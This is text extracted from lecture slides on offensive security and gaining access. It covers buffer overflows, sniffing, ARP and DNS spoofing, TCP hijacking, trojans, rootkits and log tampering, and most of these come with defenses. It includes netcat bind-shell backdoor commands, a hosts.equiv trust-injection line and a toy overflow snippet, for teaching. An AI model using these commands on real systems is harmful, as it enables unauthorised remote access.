06/10/17
1
OffensivetechnologiesFall2017
Lecture4–GainingAccessFabioMassacci
(SomeslidescourtesyofJelenaMirkovic)
06/10/17 FabioMassacci-OffensiveTechnologies 1
EthicalAcceptance• YouareboundbythetermsandcondiMonsofthiscourse
– Youtryoffensivetechnologiesonlyinthelab– YouarenotallowedtodiscloseinformaMonaboutanyindividualthatyoufindduringtheanalysis
– Yourfinaldeliverable,asapprovedbytheprofessoristheonlypublicdeliverableyouareallowedtodisclosetothirdparMes
• Anyuseoutsidetheagreedframeworkofthecoursemaybepenallyrelevant(i.e.acrime)– Everythingisisolatedfromrestofinfrastructureàyoumustdeliberatelyexfiltratematerialàcannotclaimthat“happenedbymistake”
– ThesameconsideraMonsapplyifyougivematerialtootherstudentswhohavenotsignedtheagreementàaidingandabeUng=samepenalresponsibilityasifyoudidityourself.
06/10/17
2
• TypeofinfecMonisafuncMonofaWacker’sgoal:– BotnetcreaMonàsimpleformofcontrolforlimitedfuncMonaliMes
– Virus/keylogger→credenMalthe]/spoofing/spam/remotecontrol
– Full-fledgedbackdoors→monitoring/remotecontrol– Ransomware→directmoneMsaMon&lowprofile
• RegardlessofwhattheaWackerwantstodo,he/shemusthavesomelevelofaccesstothemachine– Remotecontrol=longtermavenuefortheaWackerto“valorize"theinfecMonbutmaynotbenecessary
AWackdelivery
FabioMassacci-OffensiveTechnologies06/10/17 3
HowdoestheinfecMonhappen?• Humanvector(socialengineering)àuservulnerability
– TheaWackerconvincestheuserondoingsomethingforhim/her(e.g.installavirusmaskedasananM-virus→fakeAV)
• Tecnologicalvectoràso]warevulnerability– PrincipalcauseisthatmostsystemsarenotcapableofdisMnguishing“legiMmate”inputfrom“rogue”input(e.g.asprovidedbytheaWacker)
– Thesystemexecuteswhatever’sinmemory.– Virtuallyanyso]warehasbugsthattheaWackercanexploittodeviatetheexecuMonoftheso]waretowardsacMonsinhisownagenda.
• Mixed:e.g.linkonsocialnetwork,linkclickedbyauseronadocument,openinganemailwithamalware,IPconnectedcamerawithpre-loadedmalwareetc.
06/10/17 FabioMassacci-OffensiveTechnologies 4
06/10/17
3
• AWackerconvincestheusertoinstallavirusmaskedasalegiMmateapplicaMon
• TheexamplehereisafakeanMvirusproductcalled“Win8SecuritySystem”– Userthinksit’sactualAV– Inrealityitinfectsthesystem
Humanvector:socialengineering
FabioMassacci-OffensiveTechnologies06/10/17 5
ExampleofaWemptedinfecMon
FabioMassacci-OffensiveTechnologies06/10/17 6
06/10/17
4
Technologicalvector• TheaWackusuallyexploitssomevulnerabilityinso]ware• SystemisfedwithcomputaMonallyvalidcodesininputtoa
vulnerableso]ware→codeisexecuted• SeveraltypesofvulnerabiliMes
– XSS– Bufferoverflow– SQLi– PrivilegeescalaMon– …
• Moreexercisesanddetailsin– NetworkSecurityCourse– SecurityTesMngCourse
06/10/17 FabioMassacci-OffensiveTechnologies 7
Vulnerabilityexamples
FabioMassacci-OffensiveTechnologies06/10/17 8
06/10/17
5
BufferOverflowAWacks
• Akastack-basedoverflowaWacks• Stackstoresimportantdataonprocedurecall
FuncMoncallarguments
Returnaddress
Savedframeptr
Localvariablesforcalledprocedure
TOS
Memoryaddressincreases
BufferOverflowAWacks• ConsiderafuncMon
void sample_function(char* s) { char buffer[10]; strcpy(buffer, s); return; }
• Andamainprogramvoid main() { int i; char temp[200]; for(i=0; i<200;i++) temp[i]=‘A’; sample_function(temp); return; }
Argumentislargerthanweexpected
…
06/10/17
6
BufferOverflowAWacks
• Largeinputwillbestoredonthestack,overwriMngsysteminformaMon
FuncMoncallarguments
Returnaddress
Savedframeptr
s,buffer[10]TOS
MemoryaddressincreasesOverwriWen
byA’s
BufferOverflowAWacks
• AWackeroverwritesreturnaddresstopointsomewhereelse
– “Localvariables”porMonofthestack– PlacesaWackcodeinmachinelanguageatthatporMon– SinceitisdifficulttoknowexactaddressoftheporMon,
padsaWackcodewithNOPsbeforeanda]er
06/10/17
7
BufferOverflowAWacks
• IntrusionDetecMonSystems(IDSs)couldlookforsequenceofNOPstospotbufferoverflows
– AWackerusespolymorphism:hetransformsthecodesothatNOPischangedintosomeothercommandthatdoesthesamething,e.g.MOVR1,R1
– AWackerXORsimportantcommandswithakey– AWackerplacesXORcommandandthekeyjustbefore
theencryptedaWackcode.XORcommandisalsoobscured
BufferOverflowAWacks
• WhattypeofcommandsdoestheaWackerexecute?
– Commandsthathelphimgainaccesstothemachine– Writesastringintoinetd.conffiletostartshell
applicaMonlisteningonaport,then“logson”throughthatport
– StartsXterm
06/10/17
8
BufferOverflowAWacks
• HowdoesanaWackerdiscoverBufferoverflow?
– Looksatthesourcecode– RunsapplicaMononhismachine,triestosupply
longinputsandlooksatsystemregisters
• Readmoreat– hWp://insecure.org/sw/smashstack.html
DefensesAgainstBufferOverflows• Forsystemadministrators:
– Applypatches,keepsystemsup-to-date– DisableexecuMonfromthestack– Monitorwritesonthestack– Storereturnaddresssomewhereelse– Monitoroutgoingtraffic
• Forso]waredesigners– Applychecksforbufferoverflows– UsesafefuncMons– StaMcanddynamiccodeanalysis
06/10/17
9
NetworkAWacks• Sniffingforpasswordsandusernames• Spoofingaddresses • Hijackingasession
Sniffing• LookingatrawpacketinformaMononthewire
– Somemediaismorepronetosniffing–Ethernet– Somenetworktopologiesaremorepronetosniffing–
hubvs.switch
06/10/17
10
SniffingOnaHub• Ethernetisabroadcastmedia–everymachine
connectedtoitcanhearalltheinformaMon– Passivesniffing
ForX ForX
X
A
RY
SniffingOnaHub• AWackercangetanythingthatisnotencryptedand
issenttoLAN– Defense:encryptallsensiMvetraffic– Tcpdump
• hWp://www.tcpdump.org– Snort
• hWp://www.snort.org– Ethereal
• hWp://www.ethereal.com
06/10/17
11
SniffingOnaSwitch• Switchisconnectedbyaseparatephysicallineto
everymachineanditchoosesonlyonelinetosendthemessage
ForX
ForX X
A
RY
SniffingOnaSwitch–Take1• AWackersendsalotofARPmessagesforfake
addressestoR– Someswitchessendonallinterfaceswhentheirtable
overloads
ForX
ForX X
A
RY
06/10/17
12
SniffingOnaSwitch–Take2• AddressResoluMonProtocol(ARP)mapsIP
addresseswithMACaddresses
1.ForX
4.ForX
2.WhohasX?
3.Ido X
A
RY
SniffingOnaSwitch–Take2• AWackerusesARPpoisoningtomaphisMAC
addresstoIPaddressX
2.ForX
1. IhaveX,MAC(A)IhaveY,MAC(A)(unsolicited)
X
A
RY
3.ForX
,MAC
(A)4.ForX
,MAC
(X)
5.ForX,MAC(X)
06/10/17
13
SniffingOnaSwitch–Take2• AWackerusesARPpoisoningtomaphisMAC
addresstoIPaddressX
9.ForY,MAC(Y)
X
A
RY
7.ForY
,MAC
(A)8.ForY
,MAC
(Y)
6.ForY
AcMveSniffingTools• Dsniff
– hWp://www.monkey.org/~dugsong/dsniff– AlsoparsesapplicaMonpackets
foralotofapplicaMons– SniffsandspoofsDNS Dangerous
06/10/17
14
SpoofingDNS• AWackersniffsDNSrequests,replieswithhisown
addressfasterthanrealserver(DNScachepoisoning)
• Whenrealreplyarrivesclientignoresit• ThiscanbecoupledwithaWackonHTTPSandSSH
ifself-signedcerMficatesareallowed
SniffingDefenses• Useend-to-endencrypMonlikeDNSSEC
– NoonecansniffapplicaMontrafficlikeDNS– DNSserverswouldneedtosupportencrypMontoo
• UsestaMcswitchconfiguraMon– StaMcallyconfigureMACandIPbindingswithports– NoonecanspoofARP-IPmapping
• Don’tacceptsuspiciouscerMficates– EvenifsomeonecanhijackDNSnamestheycannot
generatevalidcerMficates– PreventsHTTPS/SSHaWacks
06/10/17
15
WhatIsIPSpoofing• Fakingsomebodyelse’sIPaddressinIPsource
addressfield• Howtospoof?
– LinuxandBSDOShavefuncMonsthatenablesuperusertocreatecustompacketsandfillinanyinformaMon
– WindowsXPalsohasthiscapabilitybutearlierWindowsversionsdon’t
IPAddressSpoofinginTCPpackets• AWackercannotseereplypackets
AliceM BobM
AWackerM1.SYN,IPAlice,SEQA
2.SYNSEQB,ACKSEQA
3.RESET
06/10/17
16
GuessingaSequenceNumber• AWackerwantstoassumeAlice’sidenMty
– HeestablishesmanyconnecMonstoBobwithhisownidenMtygetsafewsequencenumbers
– HedisablesAlice(DDoS)– HesendsSYNtoBob,BobrepliestoAlice,aWackeruses
guessedvalueofSEQBtocompleteconnecMon–TCPsessionhijacking
– IfBobandAlicehavetrustrelaMonship(/etc/hosts.equivfileinLinux)hehasjustgainedaccesstoBob
– Hecanaddhismachineto/etc/hosts.equivecho“1.2.3.4”>>/etc/hosts.equiv
• HoweasyisittoguessSEQB?
GuessingaSequenceNumber• ItusedtobeISN=f(Time),sMllisinsomeWindows
versions
06/10/17
17
GuessingaSequenceNumber• OnLinuxISN=f(Mme)+rand
GuessingaSequenceNumber• OnBSDISN=rand
06/10/17
18
SpoofingDefenses• Ingressandegressfiltering• Don’tusetrustmodelswithIPaddresses• Randomizesequencenumbers
AtTheEndofGainingAccess• AWackerhassuccessfullyloggedontoamachine
06/10/17
19
Phase4:MaintainingAccess• AWackerestablishesalisteningapplicaMonona
port(backdoor)sohecanlogonanyMmewithorwithoutapassword
• AWackersfrequentlyclosesecurityholestheyfind
NetcatTool• SimilartoLinuxcatcommand
– hWp://netcat.sourceforge.net/– Client:IniMatesconnecMontoanyportonremotemachine– Server:Listensonanyport– ToopenashellonavicMmmachine
On victim machine: nc –l –p 1234 /* This opens a backdoor */ On attacker machine: nc 123.32.34.54 1234 –c /bin/sh /* This enters through a backdoor, opens a shell */
Dangerous
06/10/17
20
NetcatTool• Usedfor
– Portscanning– Backdoor– RelayingtheaWack
Trojans• ApplicaMonthatclaimstodoonething(andlooks
likeit)butitalsodoessomethingmalicious• UsersdownloadTrojansfromInternet(thinking
theyaredownloadingafreegame)orgetthemasgreeMngcardsinE-mail,orasAcMveXcontrolswhentheyvisitaWebsite
• Trojanscanscrambleyourmachine– Theycanalsoopenabackdooronyoursystem
• TheywillalsoreportsuccessfulinfecMontotheaWacker
06/10/17
21
BackOrifice• TrojanapplicaMonthatcan
– Logkeystrokes– Stealpasswords– Createdialogboxes– Messwithfiles,processesorsystem(registry)– Redirectpackets– Setupbackdoors– Takeoverscreenandkeyboard– hWp://www.bo2k.com/
TrojanDefenses• AnMvirusso]ware• Don’tdownloadsuspiciousso]ware• CheckMD5sumontrustedso]wareyou
download• DisableautomaMcexecuMonofaWachments
06/10/17
22
AttheEndofMaintainingAccess• TheaWackerhasopenedabackdoorandcannow
accessvicMmmachineatanyMme
Phase5:CoveringTracks• Rootkits• Alterlogs• Createhard-to-spotfiles• Usecovertchannels
06/10/17
23
ApplicaMonRootkits• Alterorreplacesystemcomponents
(forinstanceDLLs)• E.g.,onLinuxaWackerreplaceslsprogram• Rootkitsfrequentlycometogetherwithsniffers:
– CaptureafewcharactersofallsessionsontheEthernetandwriteintoafiletostealpasswords
– AdministratorwouldnoMceaninterfaceinpromiscuousmode• NotifaWackermodifiesanapplicaMonthatshowsinterfaces-
netstat
ApplicaMonRootkits• AWackerwillmodifyallkeysystemapplicaMonsthat
couldrevealhispresence– Listprocessese.g.ps– Listfilese.g.ls– Showopenportse.g.netstat– ShowsystemuMlizaMone.g.top
• HewillalsosubsMtutemodificaMondatewiththeoneinthepast
06/10/17
24
DefensesAgainstApp.Rootkits• Don’tletaWackersgainrootaccess• Useintegritycheckingoffiles:
– Carryafloppywithmd5sum,checkhashesofsystemfilesagainsthashesadverMsedonvendorsiteorhashesyoustoredbefore
• UseTripwire– Freeintegritycheckerthatsavesmd5sumsofall
importantfilesinasecuredatabase(readonlyCD),thenverifiesthemperiodically
– hWp://www.tripwire.org/
KernelRootkits• Replacesystemcalls
– InterceptcallstoopenoneapplicaMonwithcallstoopenanother,ofaWacker’schoosing
– Nowevenchecksumsdon’thelpasaWackerdidnotmodifyanysystemapplicaMons
– Youwon’tevenseeaWacker’sfilesinfilelisMng– Youwon’tseesomeprocessesoropenports
• Usuallyinstalledaskernelmodules• Defenses:disablekernelmodules
06/10/17
25
AlteringLogs• Forbinarylogs:
– Stoploggingservices– Loadfilesintomemory,changethem– Restartloggingservice– Orusespecialtool
• Fortextlogssimplychangefilethroughscripts• Changeloginandeventlogs,commandhistoryfile,
lastlogindata
DefensesAgainstAlteringLogs• Useseparatelogservers
– Machineswillsendtheirlogmessagestotheseservers
• Encryptlogfiles• Makelogfilesappendonly• Savelogsonwrite-oncemedia
06/10/17
26
CreaMngHard-to-SpotFiles• Namescouldlooklikesystemfilenames,butslightly
changed– Startwith.– Startwith.andaddspaces– Makefileshidden
• Defenses:intrusiondetecMonsystemsandcauMon
AddiMonalReadings• FirstacademicpapermenMoning0-days(thatIknowof)
– O.Arkin.“TracingHackers:Part1.”ComputersandSecurity,2002.• Insightinthemarket
– C.Miller.TheLegiMmateVulnerabilityMarket.WorkshoponEconomicsofInformaFonSecurity,2006.
– AxelArnbak,HadiAsghari,MichelVanEeten,andNicoVanEijk“SecurityCollapseintheHTTPSMarket”.CommunicaMonsoftheACM57,no.10(2014):47-55.
• SomedifferentperspecMvesoncybercrime– NickNykodymetal.“Criminalprofilingandinsidercybercrime.”DigitalInvesFgaFon,2005.– D.Florencioetal.“Sex,LiesandCybercrimeSurveys”.WorkshoponEconomicsofInformaFon
Security,2006.– J.Franklin.“AnInquiryintotheNatureandCausesoftheWealthofInternetMiscreants”.
ACMConferenceonComputerandCommunicaFonSecurity,2007• AtutorialonthedifficultyofaWribuMon
– M.Marquis-Boire.BigGameHunMng:ThePeculiariMesofNaMon-StateMalwareResearch.BlackHatUSA,2015.
06/10/17 FabioMassacci-OffensiveTechnologies 52
